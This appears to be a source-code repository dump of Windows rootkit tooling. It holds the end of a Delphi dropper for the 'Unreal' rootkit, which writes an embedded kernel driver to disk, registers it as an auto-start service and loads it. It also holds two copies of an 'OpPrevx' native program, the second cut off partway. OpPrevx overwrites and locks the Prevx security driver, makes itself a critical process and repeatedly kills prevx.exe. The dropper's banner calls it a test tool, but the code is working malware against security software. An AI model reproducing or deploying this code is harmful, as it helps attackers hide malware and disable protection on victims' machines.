strcpynW(disk_buf, lpFileName, sizeof(WCHAR)); 61 | strcatW(disk_buf, '\'); 62 | GetVolumeInformationW(@disk_buf[0], nil, 0, nil, l, fsfl, fsname, MAX_PATH); 63 | result := strcmpiW(fsname, 'NTFS'); 64 | end; 65 | 66 | procedure GetCurrentDirectoryFromPEB(); 67 | var 68 | pBuf: PROCESS_BASIC_INFORMATION; 69 | bytesIO: DWORD; 70 | begin 71 | bytesIO := 0; 72 | ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, @pBuf, sizeof(PROCESS_BASIC_INFORMATION), @bytesIO); 73 | ExtractFilePathW(pBuf.PebBaseAddress^.ProcessParameters^.ImagePathName.PStr, CurrentDirectory); 74 | end; 75 | 76 | procedure LoadServiceDriver(fLoad: boolean); 77 | var 78 | drvkey: THANDLE; 79 | dat1: DWORD; 80 | attr: OBJECT_ATTRIBUTES; 81 | fname: UNICODE_STRING; 82 | begin 83 | RtlInitUnicodeString(@fname, IOPortServiceKey); 84 | 85 | attr.Length := sizeof(OBJECT_ATTRIBUTES); 86 | attr.RootDirectory := 0; 87 | attr.ObjectName := @fname; 88 | attr.Attributes := 0; 89 | attr.SecurityDescriptor := nil; 90 | attr.SecurityQualityOfService := nil; 91 | 92 | if ZwCreateKey(drvkey, KEY_ALL_ACCESS, @attr, 0, 93 | nil, REG_OPTION_NON_VOLATILE, nil) <> STATUS_SUCCESS then exit; 94 | dat1 := SERVICE_ERROR_NORMAL; 95 | RtlInitUnicodeString(@fname, str_ErrorControl); 96 | ZwSetValueKey(drvkey, @fname, 0, REG_DWORD, @dat1, sizeof(DWORD)); 97 | dat1 := SERVICE_AUTO_START; 98 | RtlInitUnicodeString(@fname, str_Start); 99 | ZwSetValueKey(drvkey, @fname, 0, REG_DWORD, @dat1, sizeof(DWORD)); 100 | dat1 := SERVICE_KERNEL_DRIVER; 101 | RtlInitUnicodeString(@fname, str_Type); 102 | ZwSetValueKey(drvkey, @fname, 0, REG_DWORD, @dat1, sizeof(DWORD)); 103 | RtlInitUnicodeString(@fname, str_ImagePath); 104 | ZwSetValueKey(drvkey, @fname, 0, REG_SZ, IOPortServiceFilePath, 105 | (strlenW(IOPortServiceFilePath) + 1) * sizeof(WideChar)); 106 | RtlInitUnicodeString(@fname, IOPortServiceKey); 107 | if fLoad then 108 | dat1 := ZwLoadDriver(@fname) 109 | else 110 | ZwUnLoadDriver(@fname); 111 | ZwClose(drvkey); 112 | end; 113 | 114 | procedure Unreal_DropFile(); 115 | var 116 | f: THANDLE; 117 | iost: IO_STATUS_BLOCK; 118 | attr: OBJECT_ATTRIBUTES; 119 | fname: UNICODE_STRING; 120 | offset1: LARGE_INTEGER; 121 | hRes: HRSRC; 122 | hResData: HGLOBAL; 123 | p1: pointer; 124 | size: cardinal; 125 | begin 126 | hRes := FindResourceW(hinst, 'UNREAL', 'BINRES'); 127 | if (hRes = 0) then exit; 128 | size := SizeOfResource(hinst, hRes); 129 | if (size = 0) then exit; 130 | hResData := LoadResource(hinst, hRes); 131 | if (hResData = 0) then exit; 132 | p1 := LockResource(hResData); 133 | if (p1 = nil) then exit; 134 | 135 | RtlInitUnicodeString(@fname, IOPortServiceFilePath); 136 | 137 | attr.Length := sizeof(OBJECT_ATTRIBUTES); 138 | attr.RootDirectory := 0; 139 | attr.ObjectName := @fname; 140 | attr.Attributes := OBJ_CASE_INSENSITIVE; 141 | attr.SecurityDescriptor := nil; 142 | attr.SecurityQualityOfService := nil; 143 | 144 | f := 0; 145 | if (ZwCreateFile(@f, FILE_WRITE_ACCESS or SYNCHRONIZE, @attr, 146 | @iost, nil, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ or FILE_SHARE_WRITE, FILE_OVERWRITE_IF, 147 | FILE_SYNCHRONOUS_IO_NONALERT or FILE_NON_DIRECTORY_FILE, nil, 0) = STATUS_SUCCESS) then 148 | begin 149 | offset1.QuadPart := 0; 150 | ZwWriteFile(f, 0, nil, nil, @iost, p1, size, @offset1, nil); 151 | ZwClose(f); 152 | end; 153 | 154 | LoadServiceDriver(false); 155 | LoadServiceDriver(true); 156 | end; 157 | 158 | const 159 | Msg1: PWideChar = '"Unreal" rootkit hides file and driver.'#13#10 + 160 | 'Works on NT-based operation systems with NTFS File System.'#13#10 + 161 | 'Your disk C: should be NTFS'#13#10 + 162 | ' !This rootkit is NOT Malicious! '#13#10 + 163 | 'This rootkit is not intended to be runned with HIPS'#13#10 + 164 | 'ONLY for tests with modern AntiRootkit software'#13#10 + 165 | '(c) 2007 MP_ART && EP_X0FF'; 166 | 167 | var 168 | LB: HWND = 0; 169 | 170 | function MainWindowProc(hwndDlg: HWND; uMsg: UINT; wParam: WPARAM; 171 | lParam: LPARAM): BOOL; stdcall; 172 | var 173 | disp: DWORD; 174 | skey: HKEY; 175 | buf: LBuf; 176 | b: boolean; 177 | begin 178 | result := false; 179 | case uMsg of 180 | WM_INITDIALOG: 181 | begin 182 | LB := GetDlgItem(hwndDlg, 666); 183 | SetWindowTextW(LB, Msg1); 184 | end; 185 | WM_CLOSE: 186 | begin 187 | EndDialog(hwndDlg, S_OK); 188 | quit := true; 189 | exit; 190 | end; 191 | WM_COMMAND: 192 | case LoWord(WParam) of 193 | 1000: 194 | begin 195 | if (Unreal_IsNTFS('C:\') <> 0) then 196 | begin 197 | MessageBoxW(hwndDlg, 'Unsupported file system, we need backdoor-friendly NTFS', nil, MB_ICONERROR); 198 | exit; 199 | end; 200 | Unreal_DropFile(); 201 | MessageBoxW(hwndDlg, 'Ok, check rootkit presence with DbgView', '', MB_OK); 202 | exit; 203 | end; 204 | 1001: 205 | begin 206 | if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, Regkey1, 0, nil, 207 | REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, skey, @disp) <> ERROR_SUCCESS) then 208 | begin 209 | MessageBoxW(hwndDlg, 'Rootkit not installed or already unistalled (uninstall in a progress)', nil, MB_ICONINFORMATION); 210 | exit; 211 | end; 212 | RegCloseKey(skey); 213 | strcpyW(buf, RegKey1); 214 | strcatW(buf, RegKey2); 215 | b := (RegDeleteKeyW(HKEY_LOCAL_MACHINE, buf) = ERROR_SUCCESS) and 216 | (RegDeleteKeyW(HKEY_LOCAL_MACHINE, Regkey1) = ERROR_SUCCESS); 217 | if b then MessageBoxW(hwndDlg, 'Reg Entry deleted successfully'#13#10'Reboot now and use this function ' + 218 | 'again to remove rootkit file!', 'Ok', MB_OK); 219 | if Unreal_DeleteFile(IOPortServiceFilePath2) then MessageBoxW(hwndDlg, 'Uninstall complete', ':)', MB_OK); 220 | exit; 221 | end; 222 | 8: 223 | begin 224 | EndDialog(hwndDlg, S_OK); 225 | quit := true; 226 | exit; 227 | end; 228 | end; 229 | end; 230 | end; 231 | 232 | procedure GUImain(); 233 | var 234 | msg1: MSG; 235 | begin 236 | MainWindow := CreateDialogParamW(0, pointer(101), 0, @MainWindowProc, 0); 237 | while GetMessageW(msg1, 0, 0, 0) do 238 | begin 239 | TranslateMessage(msg1); 240 | DispatchMessageW(msg1); 241 | if quit then 242 | begin 243 | DestroyWindow(MainWindow); 244 | break; 245 | end; 246 | end; 247 | end; 248 | 249 | function OnException(ExceptionInfo: PEXCEPTION_POINTERS): LONGINT; stdcall; 250 | var 251 | textbuf: array[0..1023] of WCHAR; 252 | begin 253 | CloseHandle(MutexHandle); 254 | strcpyW(textbuf, 'Sorry, but unhandled exception has occured'#13#10'Program will be terminated'#13#10); 255 | with ExceptionInfo^.ExceptionRecord^ do 256 | begin 257 | strcatW(textbuf, 'Exception code : 0x'); 258 | uitohexW(ExceptionCode, strendW(textbuf)); 259 | strcatW(textbuf, #13#10'Instruction address : 0x'); 260 | uitohexW(DWORD(ExceptionAddress), strendW(textbuf)); 261 | if ExceptionCode = EXCEPTION_ACCESS_VIOLATION then 262 | begin 263 | case ExceptionInformation[0] of 264 | 0: strcatW(textbuf, #13#10'Attempt to read at address : 0x'); 265 | 1: strcatW(textbuf, #13#10'Attempt to write at address : 0x'); 266 | end; 267 | uitohexW(ExceptionInformation[1], strendW(textbuf)); 268 | end; 269 | end; 270 | MessageBoxW(MainWindow, textbuf, nil, MB_ICONERROR or MB_SYSTEMMODAL); 271 | ZwTerminateProcess(GetCurrentProcess(), $DEAD); 272 | result := 0; 273 | end; 274 | 275 | begin 276 | SetLastError(0); 277 | MutexHandle := CreateMutexW(nil, false, '< Unreal > Dropper in the work'); 278 | if (GetLastError() = ERROR_ALREADY_EXISTS) then ExitProcess(0); 279 | SetUnhandledExceptionFilter(@OnException); 280 | 281 | if (RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then 282 | begin 283 | MessageBoxW(0, 'Error, load driver privilege not adjusted', nil, MB_ICONWARNING); 284 | ExitProcess(0); 285 | end; 286 | osver.dwOSVersionInfoSize := sizeof(osver); 287 | Windows.GetVersionExW(osver); 288 | if (osver.dwMajorVersion > 5) then 289 | begin 290 | MessageBoxW(0, 'Not supported Windows NT version, click OK to exit', nil, MB_OK or MB_ICONERROR); 291 | ExitProcess(0); 292 | end; 293 | hinst := GetModuleHandleW(nil); 294 | InitCommonControls(); 295 | GUImain(); 296 | CloseHandle(MutexHandle); 297 | ExitProcess(0); 298 | end. 299 | 300 | -------------------------------------------------------------------------------- /Source/OpPrevx/v1.1.199/main.cpp: -------------------------------------------------------------------------------- 1 | #include "windows.h" 2 | #include ".\rtls\ntdll.h" 3 | #include "rtl.h" 4 | 5 | #pragma comment(linker,"/ENTRY:NtProcessStartup") 6 | #pragma warning(disable:4100) 7 | 8 | char *Daniel = "Hello Daniel .|."; 9 | WCHAR buf[MAX_PATH]; 10 | 11 | HANDLE hBeep; 12 | HANDLE hMutant; 13 | 14 | 15 | void DoBeep(HANDLE f); 16 | void ScanProcesses(); 17 | NTSTATUS NTAPI WriteBufferToFile(PWSTR lpFileName, PVOID Buffer, DWORD Size, BOOL Append); 18 | 19 | NTSTATUS NTAPI BootPrint(IN PWSTR szMessage) 20 | { 21 | UNICODE_STRING us; 22 | RtlInitUnicodeString(&us,szMessage); 23 | return NtDisplayString(&us); 24 | } 25 | 26 | NTSTATUS NTAPI NtSleep(IN DWORD dwMiliseconds) 27 | { 28 | struct 29 | { 30 | DWORD Low; 31 | DWORD Hi; 32 | } MLI = {{-10000 * dwMiliseconds},{0xFFFFFFFF}}; 33 | 34 | return NtDelayExecution(0, (PLARGE_INTEGER)&MLI); 35 | } 36 | 37 | PVOID RtlGetProcessHeap() 38 | { 39 | return NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap; 40 | } 41 | 42 | NTSTATUS NTAPI ThreadRoutine(PVOID Param) 43 | { 44 | UNICODE_STRING String; 45 | OBJECT_ATTRIBUTES attr; 46 | NTSTATUS Status; 47 | 48 | RtlInitUnicodeString(&String, L"\\BaseNamedObjects\\DoTheEnd"); 49 | InitializeObjectAttributes(&attr, &String, OBJ_CASE_INSENSITIVE, 0, 0); 50 | 51 | while (1) 52 | { 53 | Status = NtOpenMutant(&hMutant, MUTANT_ALL_ACCESS, &attr); 54 | if (NT_SUCCESS(Status)) 55 | { 56 | NtClose(hMutant); 57 | RtlSetProcessIsCritical(FALSE, NULL, FALSE); 58 | NtTerminateProcess(NtCurrentProcess(), 0xC00FFEE); 59 | } 60 | NtSleep(1000); 61 | } 62 | 63 | return STATUS_SUCCESS; 64 | } 65 | 66 | NTSTATUS NTAPI NativeCreateThread( 67 | IN PVOID ThreadRoutine, 68 | OUT HANDLE *ThreadHandle, 69 | OUT HANDLE *UniqueThread, 70 | IN HANDLE ProcessHandle 71 | ) 72 | { 73 | NTSTATUS Status; 74 | ULONG AllocationSize = PAGE_SIZE * 256; 75 | PVOID BaseAddress = NULL; 76 | ULONG StackReserve = 0; 77 | PVOID ExpandableStackBase = NULL; 78 | ULONG OldProtect; 79 | ULONG ThreadRoutineLength = PAGE_SIZE; 80 | 81 | USER_STACK UserStack; 82 | CONTEXT Context; 83 | CLIENT_ID ClientId; 84 | 85 | BaseAddress = NULL; 86 | 87 | Status = NtAllocateVirtualMemory( 88 | ProcessHandle, 89 | &BaseAddress, 90 | 0, 91 | &AllocationSize, 92 | MEM_RESERVE, 93 | PAGE_READWRITE); 94 | 95 | if(!NT_SUCCESS(Status)) 96 | { 97 | return Status; 98 | } 99 | 100 | UserStack.FixedStackBase = NULL; 101 | UserStack.FixedStackLimit = NULL; 102 | UserStack.ExpandableStackBase = (PVOID)((ULONG)BaseAddress + AllocationSize); 103 | UserStack.ExpandableStackLimit = (PVOID)((ULONG)BaseAddress + AllocationSize - PAGE_SIZE); 104 | UserStack.ExpandableStackBottom = BaseAddress; 105 | 106 | ExpandableStackBase = (PVOID)((ULONG)UserStack.ExpandableStackBase - PAGE_SIZE * 2); 107 | 108 | StackReserve = PAGE_SIZE * 2; 109 | 110 | Status = NtAllocateVirtualMemory( 111 | ProcessHandle, 112 | &ExpandableStackBase, 113 | 0, 114 | &StackReserve, 115 | MEM_COMMIT, 116 | PAGE_READWRITE); 117 | if(!NT_SUCCESS(Status)) 118 | { 119 | return Status; 120 | } 121 | 122 | //create GUARD page 123 | StackReserve = PAGE_SIZE; 124 | Status = NtProtectVirtualMemory( 125 | ProcessHandle, // ProcessHandle 126 | &ExpandableStackBase, // BaseAddress 127 | &StackReserve, // ProtectSize 128 | PAGE_READWRITE | PAGE_GUARD, // NewProtect 129 | &OldProtect); // OldProtect 130 | 131 | if(!NT_SUCCESS(Status)) 132 | { 133 | return Status; 134 | } 135 | 136 | Context.SegGs = 0x00; 137 | Context.SegFs = 0x38; 138 | Context.SegEs = 0x20; 139 | Context.SegDs = 0x20; 140 | Context.SegSs = 0x20; 141 | Context.SegCs = 0x18; 142 | Context.EFlags = 0x3000; 143 | Context.ContextFlags = 0x10007; 144 | Context.Esp = (ULONG)UserStack.ExpandableStackBase; 145 | Context.Eip = (ULONG)ThreadRoutine; 146 | 147 | 148 | Status = NtCreateThread( 149 | ThreadHandle, // ThreadHandle 150 | THREAD_ALL_ACCESS, // DesiredAccess 151 | NULL, // ObjectAttributes 152 | ProcessHandle, // ProcessHandle 153 | &ClientId, // ClientId 154 | &Context, // ThreadContext 155 | (PINITIAL_TEB)&UserStack, // UserStack 156 | FALSE); // CreateSuspended 157 | 158 | if(!NT_SUCCESS(Status)) 159 | { 160 | return Status; 161 | } 162 | *UniqueThread = ClientId.UniqueThread; 163 | 164 | return Status; 165 | } 166 | 167 | BOOL NTAPI DeviceIsRunning(IN PWSTR DeviceName) 168 | { 169 | UNICODE_STRING str; 170 | OBJECT_ATTRIBUTES attr; 171 | HANDLE hLink; 172 | NTSTATUS Status; 173 | 174 | BOOL result = FALSE; 175 | 176 | RtlInitUnicodeString(&str, DeviceName); 177 | InitializeObjectAttributes(&attr, &str, OBJ_CASE_INSENSITIVE, 0, 0); 178 | Status = NtOpenSymbolicLinkObject(&hLink, SYMBOLIC_LINK_QUERY, &attr); 179 | if (NT_SUCCESS(Status)) 180 | { 181 | result = TRUE; 182 | NtClose(hLink); 183 | } 184 | return result; 185 | } 186 | 187 | PVOID NTAPI mmalloc(DWORD uSize) 188 | { 189 | PVOID result = NULL; 190 | 191 | NtAllocateVirtualMemory(NtCurrentProcess(), &result, 0, &uSize, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE); 192 | return result; 193 | } 194 | 195 | VOID NTAPI mmfree(PVOID Buffer) 196 | { 197 | DWORD memio = 0; 198 | NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memio, MEM_RELEASE); 199 | } 200 | 201 | PVOID NTAPI 202 | AllocateInfoBuffer( 203 | IN SYSTEM_INFORMATION_CLASS InfoClass, 204 | PULONG ReturnLength 205 | ) 206 | { 207 | PVOID pBuffer = NULL; 208 | ULONG uSize = PAGE_SIZE; 209 | NTSTATUS Status; 210 | 211 | do 212 | { 213 | pBuffer = mmalloc(uSize); 214 | 215 | if (pBuffer != NULL) 216 | { 217 | Status = NtQuerySystemInformation(InfoClass, pBuffer, uSize, NULL); 218 | 219 | } else return NULL; 220 | 221 | if (Status == STATUS_INFO_LENGTH_MISMATCH) 222 | { 223 | mmfree(pBuffer); 224 | uSize *= 2; 225 | } 226 | 227 | } while (Status == STATUS_INFO_LENGTH_MISMATCH); 228 | 229 | if (NT_SUCCESS(Status)) 230 | { 231 | if (ReturnLength) *ReturnLength = uSize; 232 | return pBuffer; 233 | } 234 | 235 | if (pBuffer) mmfree(pBuffer); 236 | return NULL; 237 | } 238 | 239 | typedef struct _BEEP_PARAMS { 240 | ULONG uFrequency; 241 | ULONG uDuration; 242 | } BEEP_PARAMS; 243 | 244 | HANDLE PrepareBeep() 245 | { 246 | UNICODE_STRING str; 247 | OBJECT_ATTRIBUTES attr; 248 | IO_STATUS_BLOCK iost; 249 | HANDLE f; 250 | 251 | RtlInitUnicodeString(&str, L"\\Device\\Beep"); 252 | attr.Length = sizeof(OBJECT_ATTRIBUTES); 253 | attr.RootDirectory = 0; 254 | attr.ObjectName = &str; 255 | attr.Attributes = 0; 256 | attr.SecurityDescriptor = 0; 257 | attr.SecurityQualityOfService = 0; 258 | 259 | NtCreateFile(&f, GENERIC_READ | GENERIC_WRITE, &attr, &iost, 0, 0, 260 | 0, FILE_OPEN, 0, 0, 0); 261 | 262 | return f; 263 | } 264 | 265 | void DoBeep(HANDLE f) 266 | { 267 | BEEP_PARAMS param; 268 | IO_STATUS_BLOCK iost; 269 | 270 | param.uFrequency = 2500; 271 | param.uDuration = 10; 272 | 273 | NtDeviceIoControlFile(f, 0, 0, 0, &iost, 0x00010000, 274 | ¶m, sizeof(BEEP_PARAMS), 0, 0); 275 | } 276 | 277 | NTSTATUS NativeDeleteFile(PWSTR FileName) 278 | { 279 | HANDLE hFile; 280 | NTSTATUS Status; 281 | OBJECT_ATTRIBUTES attr; 282 | IO_STATUS_BLOCK iost; 283 | FILE_DISPOSITION_INFORMATION fDispositionInfo; 284 | FILE_BASIC_INFORMATION fBasicInfo; 285 | UNICODE_STRING TargetFileName; 286 | 287 | Status = STATUS_UNSUCCESSFUL; 288 | 289 | RtlInitUnicodeString(&TargetFileName, FileName); 290 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 291 | 292 | Status = NtOpenFile(&hFile, DELETE | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES, 293 | &attr, &iost, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 294 | FILE_NON_DIRECTORY_FILE | FILE_OPEN_FOR_BACKUP_INTENT); 295 | if (NT_SUCCESS(Status)) 296 | { 297 | Status = NtQueryInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 298 | if (NT_SUCCESS(Status)) 299 | { 300 | fBasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL; 301 | NtSetInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 302 | } 303 | fDispositionInfo.DeleteFile = TRUE; 304 | Status = NtSetInformationFile(hFile, &iost, &fDispositionInfo, sizeof(FILE_DISPOSITION_INFORMATION), FileDispositionInformation); 305 | NtClose(hFile); 306 | } 307 | return Status; 308 | } 309 | 310 | NTSTATUS 311 | NTAPI 312 | WriteBufferToFile( 313 | PWSTR lpFileName, 314 | PVOID Buffer, 315 | DWORD Size, 316 | BOOL Append 317 | ) 318 | { 319 | HANDLE fh; 320 | NTSTATUS ns; 321 | DWORD dwFlag; 322 | OBJECT_ATTRIBUTES attr; 323 | UNICODE_STRING str1; 324 | FILE_STANDARD_INFORMATION fs1; 325 | IO_STATUS_BLOCK iost; 326 | 327 | 328 | iost.Information = 0; 329 | 330 | if (RtlDosPathNameToNtPathName_U(lpFileName, &str1, NULL, NULL)) { 331 | 332 | ns = FILE_WRITE_ACCESS | SYNCHRONIZE; 333 | dwFlag = FILE_OVERWRITE_IF; 334 | 335 | if (Append) { 336 | ns |= FILE_READ_ACCESS; 337 | dwFlag = FILE_OPEN_IF; 338 | } 339 | 340 | InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL); 341 | 342 | ns = NtCreateFile(&fh, ns, &attr, 343 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, 344 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 345 | 346 | if (NT_SUCCESS(ns)) 347 | { 348 | if (Append) 349 | { 350 | ns = NtQueryInformationFile(fh, &iost, &fs1, 351 | sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation); 352 | if (NT_SUCCESS(ns)) { 353 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, &fs1.EndOfFile, NULL); 354 | } 355 | } 356 | else { 357 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, NULL, NULL); 358 | } 359 | NtFlushBuffersFile(fh, &iost); 360 | NtClose(fh); 361 | } 362 | RtlFreeUnicodeString(&str1); 363 | } 364 | return ns; 365 | } 366 | 367 | void ScanProcesses() 368 | { 369 | ULONG r; 370 | PSYSTEM_PROCESSES_INFORMATION Info, p; 371 | HANDLE hProcess; 372 | NTSTATUS Status; 373 | OBJECT_ATTRIBUTES attr; 374 | CLIENT_ID cid; 375 | 376 | 377 | p = (PSYSTEM_PROCESSES_INFORMATION)AllocateInfoBuffer(SystemProcessInformation, &r); 378 | if (p == NULL) return; 379 | Info = p; 380 | for (;;) 381 | { 382 | if (Info->ProcessName.Buffer) 383 | { 384 | if (strcmpiW(Info->ProcessName.Buffer, L"prevx.exe") == 0) 385 | { 386 | cid.UniqueProcess = (HANDLE)Info->ProcessId; 387 | cid.UniqueThread = 0; 388 | InitializeObjectAttributes(&attr, 0, 0, 0, 0); 389 | 390 | Status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &cid); 391 | if (NT_SUCCESS(Status)) 392 | { 393 | NtTerminateProcess(hProcess, 0); 394 | NtClose(hProcess); 395 | } 396 | DoBeep(hBeep); 397 | } 398 | } 399 | if (Info->NextEntryDelta == 0) break; 400 | Info = (PSYSTEM_PROCESSES_INFORMATION)(((PUCHAR)Info)+ Info->NextEntryDelta); 401 | } 402 | mmfree(p); 403 | } 404 | 405 | void BlockDriverAtDisk() 406 | { 407 | HANDLE hFile; 408 | OBJECT_ATTRIBUTES attr; 409 | IO_STATUS_BLOCK iost; 410 | UNICODE_STRING TargetFileName; 411 | LARGE_INTEGER cb, bo; 412 | NTSTATUS Status; 413 | 414 | RtlInitUnicodeString(&TargetFileName, L"\\SystemRoot\\system32\\drivers\\pxrts.sys"); 415 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 416 | 417 | Status = NtCreateFile(&hFile, FILE_READ_ACCESS | FILE_WRITE_ACCESS | SYNCHRONIZE, &attr, 418 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, 419 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 420 | 421 | if (NT_SUCCESS(Status)) 422 | { 423 | Status = NtWriteFile(hFile, 0, 0, 0, &iost, buf, sizeof(buf), 0, 0); 424 | 425 | if (NT_SUCCESS(Status)) 426 | { 427 | bo.HighPart = 0; 428 | bo.LowPart = 0; 429 | 430 | cb.HighPart = 0; 431 | cb.LowPart = sizeof(buf); 432 | 433 | NtLockFile(hFile, 0, 0, 0, &iost, &bo, &cb, 0, TRUE, TRUE); 434 | } 435 | } 436 | } 437 | 438 | void NtProcessStartup( PSTARTUP_ARGUMENT Argument ) 439 | { 440 | HANDLE ThreadHandle, UniqueThread; 441 | NTSTATUS Status; 442 | 443 | if (DeviceIsRunning(L"\\??\\pxscan")) 444 | { 445 | 446 | BlockDriverAtDisk(); 447 | hBeep = PrepareBeep(); 448 | 449 | Status = NativeCreateThread(&ThreadRoutine, &ThreadHandle, &UniqueThread, NtCurrentProcess()); 450 | if (NT_SUCCESS(Status)) 451 | { 452 | NtClose(ThreadHandle); 453 | } 454 | RtlSetProcessIsCritical(TRUE, NULL, FALSE); 455 | 456 | while ( 1 ) 457 | { 458 | NtSleep(1000); 459 | ScanProcesses(); 460 | } 461 | if (hBeep) NtClose(hBeep); 462 | } 463 | 464 | NtTerminateProcess(NtCurrentProcess(), 0); 465 | __asm 466 | { 467 | jmp Daniel 468 | } 469 | } -------------------------------------------------------------------------------- /Source/OpPrevx/v1.1.209/main.cpp: -------------------------------------------------------------------------------- 1 | #include "windows.h" 2 | #include ".\rtls\ntdll.h" 3 | #include "rtl.h" 4 | 5 | #pragma comment(linker,"/ENTRY:NtProcessStartup") 6 | #pragma warning(disable:4100) 7 | 8 | char *Daniel = "Hello Daniel .|."; 9 | WCHAR buf[MAX_PATH]; 10 | 11 | HANDLE hBeep; 12 | HANDLE hMutant; 13 | 14 | 15 | void DoBeep(HANDLE f); 16 | void ScanProcesses(); 17 | NTSTATUS NTAPI WriteBufferToFile(PWSTR lpFileName, PVOID Buffer, DWORD Size, BOOL Append); 18 | 19 | NTSTATUS NTAPI BootPrint(IN PWSTR szMessage) 20 | { 21 | UNICODE_STRING us; 22 | RtlInitUnicodeString(&us,szMessage); 23 | return NtDisplayString(&us); 24 | } 25 | 26 | NTSTATUS NTAPI NtSleep(IN DWORD dwMiliseconds) 27 | { 28 | struct 29 | { 30 | DWORD Low; 31 | DWORD Hi; 32 | } MLI = {{-10000 * dwMiliseconds},{0xFFFFFFFF}}; 33 | 34 | return NtDelayExecution(0, (PLARGE_INTEGER)&MLI); 35 | } 36 | 37 | PVOID RtlGetProcessHeap() 38 | { 39 | return NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap; 40 | } 41 | 42 | NTSTATUS NTAPI ThreadRoutine(PVOID Param) 43 | { 44 | UNICODE_STRING String; 45 | OBJECT_ATTRIBUTES attr; 46 | NTSTATUS Status; 47 | 48 | RtlInitUnicodeString(&String, L"\\BaseNamedObjects\\DoTheEnd"); 49 | InitializeObjectAttributes(&attr, &String, OBJ_CASE_INSENSITIVE, 0, 0); 50 | 51 | while (1) 52 | { 53 | Status = NtOpenMutant(&hMutant, MUTANT_ALL_ACCESS, &attr); 54 | if (NT_SUCCESS(Status)) 55 | { 56 | NtClose(hMutant); 57 | RtlSetProcessIsCritical(FALSE, NULL, FALSE); 58 | NtTerminateProcess(NtCurrentProcess(), 0xC00FFEE); 59 | } 60 | NtSleep(1000); 61 | } 62 | 63 | return STATUS_SUCCESS; 64 | } 65 | 66 | NTSTATUS NTAPI NativeCreateThread( 67 | IN PVOID ThreadRoutine, 68 | OUT HANDLE *ThreadHandle, 69 | OUT HANDLE *UniqueThread, 70 | IN HANDLE ProcessHandle 71 | ) 72 | { 73 | NTSTATUS Status; 74 | ULONG AllocationSize = PAGE_SIZE * 256; 75 | PVOID BaseAddress = NULL; 76 | ULONG StackReserve = 0; 77 | PVOID ExpandableStackBase = NULL; 78 | ULONG OldProtect; 79 | ULONG ThreadRoutineLength = PAGE_SIZE; 80 | 81 | USER_STACK UserStack; 82 | CONTEXT Context; 83 | CLIENT_ID ClientId; 84 | 85 | BaseAddress = NULL; 86 | 87 | Status = NtAllocateVirtualMemory( 88 | ProcessHandle, 89 | &BaseAddress, 90 | 0, 91 | &AllocationSize, 92 | MEM_RESERVE, 93 | PAGE_READWRITE); 94 | 95 | if(!NT_SUCCESS(Status)) 96 | { 97 | return Status; 98 | } 99 | 100 | UserStack.FixedStackBase = NULL; 101 | UserStack.FixedStackLimit = NULL; 102 | UserStack.ExpandableStackBase = (PVOID)((ULONG)BaseAddress + AllocationSize); 103 | UserStack.ExpandableStackLimit = (PVOID)((ULONG)BaseAddress + AllocationSize - PAGE_SIZE); 104 | UserStack.ExpandableStackBottom = BaseAddress; 105 | 106 | ExpandableStackBase = (PVOID)((ULONG)UserStack.ExpandableStackBase - PAGE_SIZE * 2); 107 | 108 | StackReserve = PAGE_SIZE * 2; 109 | 110 | Status = NtAllocateVirtualMemory( 111 | ProcessHandle, 112 | &ExpandableStackBase, 113 | 0, 114 | &StackReserve, 115 | MEM_COMMIT, 116 | PAGE_READWRITE); 117 | if(!NT_SUCCESS(Status)) 118 | { 119 | return Status; 120 | } 121 | 122 | //create GUARD page 123 | StackReserve = PAGE_SIZE; 124 | Status = NtProtectVirtualMemory( 125 | ProcessHandle, // ProcessHandle 126 | &ExpandableStackBase, // BaseAddress 127 | &StackReserve, // ProtectSize 128 | PAGE_READWRITE | PAGE_GUARD, // NewProtect 129 | &OldProtect); // OldProtect 130 | 131 | if(!NT_SUCCESS(Status)) 132 | { 133 | return Status; 134 | } 135 | 136 | Context.SegGs = 0x00; 137 | Context.SegFs = 0x38; 138 | Context.SegEs = 0x20; 139 | Context.SegDs = 0x20; 140 | Context.SegSs = 0x20; 141 | Context.SegCs = 0x18; 142 | Context.EFlags = 0x3000; 143 | Context.ContextFlags = 0x10007; 144 | Context.Esp = (ULONG)UserStack.ExpandableStackBase; 145 | Context.Eip = (ULONG)ThreadRoutine; 146 | 147 | 148 | Status = NtCreateThread( 149 | ThreadHandle, // ThreadHandle 150 | THREAD_ALL_ACCESS, // DesiredAccess 151 | NULL, // ObjectAttributes 152 | ProcessHandle, // ProcessHandle 153 | &ClientId, // ClientId 154 | &Context, // ThreadContext 155 | (PINITIAL_TEB)&UserStack, // UserStack 156 | FALSE); // CreateSuspended 157 | 158 | if(!NT_SUCCESS(Status)) 159 | { 160 | return Status; 161 | } 162 | *UniqueThread = ClientId.UniqueThread; 163 | 164 | return Status; 165 | 